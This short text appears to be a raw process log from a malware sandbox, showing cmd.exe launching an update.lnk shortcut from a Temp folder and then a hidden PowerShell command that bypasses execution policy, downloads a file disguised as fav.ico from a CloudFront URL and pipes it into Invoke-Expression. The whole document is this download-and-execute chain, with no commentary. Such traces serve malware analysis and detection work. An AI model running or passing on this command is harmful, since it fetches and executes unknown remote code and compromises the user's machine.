cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "UNuIVuqbgBDl" C:\Users\test22\AppData\Local\Temp\update.lnk
3056powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -WindowStyle Hidden -ep bypass -c ""iwr https://d35u6pvfsr5oqz.cloudfront.net/fav.ico -o v.ico;type v.ico""|iex
2184